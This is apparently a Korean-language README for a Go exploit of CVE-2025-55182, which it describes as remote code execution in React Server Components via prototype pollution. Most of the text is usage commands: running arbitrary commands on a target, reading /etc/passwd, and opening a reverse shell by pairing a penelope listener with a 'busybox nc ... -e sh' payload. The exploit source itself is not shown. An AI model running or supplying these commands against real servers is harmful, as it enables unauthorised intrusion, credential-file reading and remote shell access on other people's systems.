
Go 기반 CVE-2025-55182 익스플로잇으로, 프로토타입 오염을 통해 React Server Components에서 원격 코드 실행을 달성합니다. 임의 명령 실행 및 리버스 셸 페이로드를 지원합니다.
프로토타입 오염을 통한 React Server Components의 RCE(원격 코드 실행) 공격 코드입니다.
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
리버스 셸 설정
penelope -i 0.0.0.0 -p 1337
busybox 사용:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .